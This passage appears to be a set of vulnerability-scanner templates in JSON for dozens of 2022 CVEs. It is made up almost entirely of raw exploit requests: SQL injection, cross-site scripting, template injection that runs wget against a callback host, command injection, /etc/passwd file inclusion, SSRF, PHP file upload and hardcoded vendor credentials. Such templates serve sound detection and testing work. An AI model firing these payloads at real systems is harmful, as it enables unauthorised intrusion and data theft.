{{Hostname}}\n\nnewUI=1&page=login&username=admin&langChange=0&ipaddr=196.219.234.10&login_page=x\");alert(9);x=(\"&homepage=main.html&sysinitpage=sysinit.shtml&wizardpage=wiz.shtml&hostname=0.0.0.1&key=M94947765&password=ab4e98e4640b6c1ee88574ec0f13f908&lang_select=en\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["x\");alert(9);x=(\"?login=0\");"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29078","info":{"name":"Node.js Embedded JavaScript 3.1.6 - Template Injection","severity":"critical"},"requests":[{"raw":["GET /page?id={{randstr}}&settings[view%20options][outputFunctionName]=x;process.mainModule.require(%27child_process%27).execSync(%27wget+http://{{interactsh-url}}%27);s HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["You are viewing page number"]}]}]},{"id":"CVE-2022-40032","info":{"name":"Simple Task Managing System v1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nPOST /task/loginValidation.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlogin=test'%20AND%20(SELECT%208979%20FROM%20(SELECT(SLEEP(7-(IF(ORD(MID((SELECT%20DISTINCT(IFNULL(CAST(schema_name%20AS%20NCHAR)%2c0x20))%20FROM%20INFORMATION_SCHEMA.SCHEMATA%20LIMIT%200%2c1)%2c12%2c1))%3e48%2c0%2c1)))))jaXJ)--%20HgKq&password=\n"],"matchers":[{"type":"dsl","dsl":["duration>=7","status_code == 302","contains(location, 'login.php')","contains(content_type, \"text/html\")"],"condition":"and"}]}]},{"id":"CVE-2022-41412","info":{"name":"perfSONAR 4.x <= 4.4.4 - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/perfsonar-graphs/cgi-bin/graphData.cgi?action=ma_data&url=http://oast.fun/esmond/perfsonar/archive/../../../&src=8.8.8.8&dest=8.8.4.4"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["

    Interactsh Server

    "]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-34576","info":{"name":"WAVLINK WN535 G3 - Improper Access Control","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/ExportAllSettings.sh"],"matchers-condition":"and","matchers":[{"type":"word","words":["Login=","Password=","Model=","AuthMode="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1057","info":{"name":"WordPress Pricing Deals for WooCommerce <=2.0.2.02 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nGET /wp-admin/admin-ajax.php?action=vtprd_product_search_ajax&term=aaa%27+union+select+1,sleep(6),3--+- HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 500","contains(body, \"been a critical error\")"],"condition":"and"}]}]},{"id":"CVE-2022-26833","info":{"name":"Open Automation Software OAS Platform V16.00.0121 - Missing Authentication","severity":"critical"},"requests":[{"raw":["POST /OASREST/v2/authenticate HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept: */*\nConnection: keep-alive\nContent-Type: application/json\n\n{\"username\": \"\", \"password\": \"\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"status\":","\"data\":","\"token\":","\"clientid\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-45365","info":{"name":"Stock Ticker <= 3.23.2 - Cross-Site-Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=stockticker_symbol_search_test&symbol=test&endpoint=%3Cimg+src%3Dx+onerror%3D%26%23x61%3B%26%23x6c%3B%26%23x65%3B%26%23x72%3B%26%23x74%3B%28document.domain%29%3E\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Stock Ticker Fatal","\n------WebKitFormBoundaryoLtdjuqj2ixPvBhA\nContent-Disposition: form-data; name=\"CSRF_token\"\n\n{{csrf}}\n------WebKitFormBoundaryoLtdjuqj2ixPvBhA--\n","GET /sites/default/assets/img/attachments/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_4 == 200","contains(content_type_4, \"text/html\")","contains(body_4, \"a63fd49130de6406a66600cd8caa162f\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["name=\"CSRF_token\" value=\"([0-9a-zA-Z]+)\"/>"],"internal":true}]}]},{"id":"CVE-2022-38322","info":{"name":"Temenos Transact - Cross-Site Scripting","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/jsps/helprequest.jsp?url=%27)%22+onerror=%22confirm(%27document.domain%27)%22"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["setupHelp('')\" onerror=\"confirm('document.domain')"]},{"type":"word","part":"content_type","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-22963","info":{"name":"Spring Cloud - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /functionRouter HTTP/1.1\nHost: {{Hostname}}\nspring.cloud.function.routing-expression: T(java.net.InetAddress).getByName(\"{{interactsh-url}}\")\nContent-Type: application/x-www-form-urlencoded\n\n{{rand_base(8)}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http","dns"],"condition":"or"},{"type":"status","status":[500]}]}]},{"id":"CVE-2022-47615","info":{"name":"LearnPress Plugin < 4.2.0 - Local File Inclusion","severity":"critical"},"requests":[{"raw":["GET /wp-json/lp/v1/courses/archive-course?template_path=..%2F..%2F..%2Fetc%2Fpasswd&return_type=html HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"word","part":"body","words":["\"status\":","\"pagination\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1815","info":{"name":"Drawio <18.1.2 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["GET /service/0/test.oast.me HTTP/2\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body, 'Interactsh Server')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2022-23808","info":{"name":"phpMyAdmin < 5.1.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/phpmyadmin/setup/index.php?page=servers&mode=test&id=%22%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/setup/index.php?page=servers&mode=test&id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\">","

    Add a new server

    ","phpMyAdmin setup"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-45362","info":{"name":"WordPress Paytm Payment Gateway <=2.7.0 - Server-Side Request Forgery","severity":"medium"},"requests":[{"raw":["GET /?paytm_action=curltest&url={{interactsh-url}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["paytm-payments.css"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2599","info":{"name":"WordPress Anti-Malware Security and Brute-Force Firewall <4.21.83 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=GOTMLS-settings&GOTMLS_debug=<%2Fscript><img+src+onerror%3Dalert%28document.domain%29> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><img src onerror=alert(document.domain)>","GOTMLS_mt"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29299","info":{"name":"SolarView Compact 6.00 - 'time_begin' Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Solar_History.php?time_begin=xx%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3C%22&time_end=&event_level=0&event_pcs=1&search_on=on&search_off=on&word=hj%27&sort_type=0&record=10&command=%95%5C%8E%A6"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script><\"\">","/Solar_History.php\" METHOD=\"post\">"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29383","info":{"name":"NETGEAR ProSafe SSL VPN firmware - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /scgi-bin/platform.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=utf-8\n\nthispage=index.htm&USERDBUsers.UserName=NjVI&USERDBUsers.Password=&USERDBDomains.Domainname=geardomain'+AND+'5434'%3d'5435'+AND+'MwLj'%3d'MwLj&button.login.USERDBUsers.router_status=Login&Login.userAgent=MDpd\n","POST /scgi-bin/platform.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=utf-8\n\nthispage=index.htm&USERDBUsers.UserName=NjVI&USERDBUsers.Password=&USERDBDomains.Domainname=geardomain'+AND+'5434'%3d'5434'+AND+'MwLj'%3d'MwLj&button.login.USERDBUsers.router_status=Login&Login.userAgent=MDpd\n"],"matchers":[{"type":"dsl","dsl":["contains(body_1, \"User authentication Failed\")","contains(body_2, \"User Login Failed for SSLVPN User.\")"],"condition":"and"}]}]},{"id":"CVE-2022-31299","info":{"name":"Haraj 3.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/payform.php?type=upgrade&upgradeid=1&upgradegd=6&price=123&t=1¬e=%3C/textarea%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><script>alert(document.domain)</script></textarea>","content=\"nextHaraj"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-23178","info":{"name":"Crestron Device - Credentials Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/aj.html?a=devi"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"uname\":","\"upassword\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2290","info":{"name":"Trilium <0.52.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/custom/%3Cimg%20src=x%20onerror=alert(document.domain)%3E","{{BaseURL}}/share/api/notes/%3Cimg%20src=x%20onerror=alert(document.domain)%3E","{{BaseURL}}/share/api/images/%3Cimg%20src=x%20onerror=alert(document.domain)%3E/filename"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["No handler matched for custom <img src=x onerror=alert(document.domain)>","Note '<img src=x onerror=alert(document.domain)>' not found"],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2022-23779","info":{"name":"Zoho ManageEngine - Internal Hostname Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/themes"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["/themes/","text/html"],"condition":"and"},{"type":"word","part":"location","negative":true,"words":["{{Host}}"]},{"type":"word","words":["<center><h1>301 Moved Permanently</h1></center>"]},{"type":"regex","part":"location","regex":["https?:\\/\\/(.*):"]},{"type":"status","status":[301]}],"extractors":[{"type":"regex","group":1,"regex":["https?:\\/\\/(.*):"],"part":"location"}]}]},{"id":"CVE-2022-34045","info":{"name":"WAVLINK WN530HG4 - Improper Access Control","severity":"critical"},"requests":[{"raw":["GET /backupsettings.dat HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Salted__"]},{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-44949","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=entities/fields&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryfKx13B5QBU5Sccgf\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"form_session_token\"\n\n{{nonce}}\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"entities_id\"\n\n24\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"forms_tabs_id\"\n\n29\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"name\"\n\ntest\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"short_name\"\n\n<script>alert(document.domain)</script>\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"type\"\n\nfieldtype_input\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"fields_configuration[width]\"\n\ninput-small\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"fields_configuration[default_value]\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"fields_configuration[is_unique]\"\n\n0\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"fields_configuration[unique_error_msg]\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"required_message\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"tooltip\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"tooltip_item_page\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"access_template\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"access[5]\"\n\nyes\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"access[4]\"\n\nyes\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"notes\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf--\n"],"redirects":true,"max-redirects":3,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-34047","info":{"name":"WAVLINK WN530HG4 - Improper Access Control","severity":"high"},"requests":[{"raw":["GET /set_safety.shtml?r=52300 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["var syspasswd=\"","<title>APP"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["syspasswd=\"(.+?)\""]}]}]},{"id":"CVE-2022-47002","info":{"name":"Masa CMS - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","GET /index.cfm/_api/json/v1/{{siteid}}/content/?fields=lastupdatebyid HTTP/1.1\nHost: {{Hostname}}\n","GET /admin/?muraAction=cEditProfile.edit HTTP/1.1\nHost: {{Hostname}}\nCookie: userid={{uuid}}; userhash=\n"],"redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_3,\"\\\"userid\\\"\")"],"condition":"and"},{"type":"word","part":"body_3","words":["Edit Profile"]}],"extractors":[{"type":"regex","name":"siteid","group":1,"regex":["siteid:\"(.*?)\""],"internal":true,"part":"body"},{"type":"regex","name":"uuid","group":1,"regex":["\"lastupdatebyid\":\"([A-F0-9-]+)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-25125","info":{"name":"MCMS 5.2.4 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/mdiy/dict/listExcludeApp?query=1&dictType=1&orderBy=1/**/or/**/updatexml(1,concat(0x7e,md5('{{num}}'),0x7e),1)/**/or/**/1"],"headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["c8c605999f3d8352d7bb792cf3fdb25"]},{"type":"word","part":"header","words":["application/json"]}]}]},{"id":"CVE-2022-30777","info":{"name":"Parallels H-Sphere 3.6.1713 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index_en.php?from=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/index.php?from=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["\"><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-40879","info":{"name":"kkFileView 4.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/onlinePreview?url=aHR0cHM6Ly93d3cuZ29vZ2xlLjxpbWcgc3JjPTEgb25lcnJvcj1hbGVydChkb2N1bWVudC5kb21haW4pPj1QUQ=="],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=1 onerror=alert(document.domain)>=PQ</p>","\u8be5\u6587\u4ef6\u4e0d"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-39986","info":{"name":"RaspAP 2.8.7 - Unauthenticated Command Injection","severity":"critical"},"requests":[{"raw":["POST /ajax/openvpn/del_ovpncfg.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncfg_id=;id;#\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["uid=([0-9(a-z-)]+) gid=([0-9(a-z-)]+) groups=([0-9(a-z-)]+)"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-32024","info":{"name":"Car Rental Management System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /admin/ajax.php?action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /booking.php?car_id=-1%20union%20select%201,md5({{num}}),3,4,5,6,7,8,9,10--+ HTTP/1.1\nHost: {{Hostname}}\n"],"skip-variables-check":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-26138","info":{"name":"Atlassian Questions For Confluence - Hardcoded Credentials","severity":"critical"},"requests":[{"raw":["POST /dologin.action HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nos_username={{os_username}}&os_password={{os_password}}&login=Log+in&os_destination=%2Fhttpvoid.action\n"],"payloads":{"os_username":["disabledsystemuser"],"os_password":["disabled1system1user6708"]},"attack":"pitchfork","matchers":[{"type":"dsl","dsl":["location == \"/httpvoid.action\""]}]}]},{"id":"CVE-2022-30073","info":{"name":"WBCE CMS 1.5.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /admin/login/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nurl=&username_fieldname=username_axh5kevh&password_fieldname=password_axh5kevh&username_axh5kevh={{username}}&password_axh5kevh={{password}}&submit=Login\n","GET /admin/users/index.php HTTP/1.1\nHost: {{Hostname}}\n","POST /admin/users/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nformtoken={{formtoken}}&user_id=&username_fieldname=username_tep83j9z&username_tep83j9z=testme2&password=temp1234&password2=temp1234&display_name=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&email=testme2%40abc.com&home_folder=&groups%5B%5D=1&active%5B%5D=1&submit=\n","GET /admin/users/index.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<p><b><script>alert(document.cookie)</script>","WBCECMS"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"formtoken","group":1,"regex":["<input\\stype=\"hidden\"\\sname=\"formtoken\"\\svalue=\"([^\"]*)\"\\s/>"],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-48197","info":{"name":"Yahoo User Interface library (YUI2) TreeView v2.8.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}{{paths}}"],"payloads":{"paths":["/libs/bower/bower_components/yui2/sandbox/treeview/up.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E","/libs/bower/bower_components/yui2/sandbox/treeview/sam.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E","/libs/bower/bower_components/yui2/sandbox/treeview/renderhidden.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E","/libs/bower/bower_components/yui2/sandbox/treeview/removechildren.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E","/libs/bower/bower_components/yui2/sandbox/treeview/removeall.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E","/libs/libs/bower/bower_components/yui2/sandbox/treeview/readd.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E","/libs/bower/bower_components/yui2/sandbox/treeview/overflow.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E","/libs/bower/bower_components/yui2/sandbox/treeview/newnode2.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E","/libs/bower/bower_components/yui2/sandbox/treeview/newnode.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"]},"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["1'\"()&%<zzz><script>alert(document.domain)</script>","widget.TreeView"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1386","info":{"name":"WordPress Fusion Builder <3.6.2 - Server-Side Request Forgery","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nOrigin: {{BaseURL}}\nReferer: {{RootURL}}\n\naction=fusion_form_update_view\n","POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------30259827232283860776499538268\nOrigin: {{BaseURL}}\nReferer: {{RootURL}}\n\n-----------------------------30259827232283860776499538268\nContent-Disposition: form-data; name=\"formData\"\n\nemail=example%40oast.me&fusion_privacy_store_ip_ua=false&fusion_privacy_expiration_interval=48&priva\ncy_expiration_action=ignore&fusion-form-nonce-0={{fusionformnonce}}&fusion-fields-hold-private-data=\n-----------------------------30259827232283860776499538268\nContent-Disposition: form-data; name=\"action\"\n\nfusion_form_submit_form_to_url\n-----------------------------30259827232283860776499538268\nContent-Disposition: form-data; name=\"fusion_form_nonce\"\n\n{{fusionformnonce}}\n-----------------------------30259827232283860776499538268\nContent-Disposition: form-data; name=\"form_id\"\n\n0\n-----------------------------30259827232283860776499538268\nContent-Disposition: form-data; name=\"post_id\"\n\n0\n-----------------------------30259827232283860776499538268\nContent-Disposition: form-data; name=\"field_labels\"\n\n{\"email\":\"Email address\"}\n-----------------------------30259827232283860776499538268\nContent-Disposition: form-data; name=\"hidden_field_names\"\n\n[]\n-----------------------------30259827232283860776499538268\nContent-Disposition: form-data; name=\"fusionAction\"\n\nhttps://oast.me\n-----------------------------30259827232283860776499538268\nContent-Disposition: form-data; name=\"fusionActionMethod\"\n\nGET\n-----------------------------30259827232283860776499538268--\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["Interactsh Server"]},{"type":"status","status":[200]}],"extractors":[{"type":"xpath","name":"fusionformnonce","internal":true,"xpath":["//*[@id=\"fusion-form-nonce-0\"]"],"attribute":"value","part":"body_1"}]}]},{"id":"CVE-2022-38296","info":{"name":"Cuppa CMS v1.0 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /js/jquery_file_upload/server/php/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundary9MZjlIG8fVPjrlCI\n\n------WebKitFormBoundary9MZjlIG8fVPjrlCI\nContent-Disposition: form-data; name=\"path\"\n\n/\n------WebKitFormBoundary9MZjlIG8fVPjrlCI\nContent-Disposition: form-data; name=\"unique_name\"\n\ntrue\n------WebKitFormBoundary9MZjlIG8fVPjrlCI\nContent-Disposition: form-data; name=\"resize_width\"\n\n\n------WebKitFormBoundary9MZjlIG8fVPjrlCI\nContent-Disposition: form-data; name=\"resize_height\"\n\n\n------WebKitFormBoundary9MZjlIG8fVPjrlCI\nContent-Disposition: form-data; name=\"crop\"\n\n\n------WebKitFormBoundary9MZjlIG8fVPjrlCI\nContent-Disposition: form-data; name=\"compress\"\n\n\n------WebKitFormBoundary9MZjlIG8fVPjrlCI\nContent-Disposition: form-data; name=\"files[]\"; filename=\"test-{{randstr}}.jpg\"\nContent-Type: image/jpeg\n\n<?php\n\necho md5(\"CVE-2022-38296\");\n\n?>\n------WebKitFormBoundary9MZjlIG8fVPjrlCI--\n","POST /js/filemanager/api/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"from\":\"//{{filename}}\",\"to\":\"//{{randstr}}.php\",\"action\":\"rename\"}\n","GET /media/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["ed6bf8b1b4b8e64836455fe32b958c2c"],"condition":"and"},{"type":"word","part":"header_3","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"filename","group":1,"regex":["\"name\":\"(.*?)\","],"internal":true}]}]},{"id":"CVE-2022-47966","info":{"name":"ManageEngine - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /SamlResponseServlet HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nSAMLResponse={{url_encode(base64(SAMLResponse))}}&RelayState=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["Unknown error occurred while processing your request"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2022-33119","info":{"name":"NUUO NVRsolo Video Recorder 03.06.02 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nReferer: \"><script>alert(document.domain)</script><\"\n\nlanguage=en&user=user&pass=pass&submit=Login\n"],"matchers":[{"type":"dsl","dsl":["contains(header, \"text/html\")","status_code == 200","contains(body,'<script>alert(document.domain)</script><\\\"?cmd=')"],"condition":"and"}]}]},{"id":"CVE-2022-1221","info":{"name":"WordPress Gwyn's Imagemap Selector <=0.3.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/gwyns-imagemap-selector/popup.php?id=1&class=%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/wp-content/plugins/gwyns-imagemap-selector/popup.php?id=1%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script> popup-"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-39952","info":{"name":"Fortinet FortiNAC - Arbitrary File Write","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/configWizard/keyUpload.jsp"],"body":"--{{boundaryId}}\nContent-Disposition: form-data; name=\"key\"; filename=\"{{to_lower(rand_text_alphanumeric(8))}}.zip\"\n\n{{randstr}}\n--{{boundaryId}}--\n","headers":{"Content-Type":"multipart/form-data; 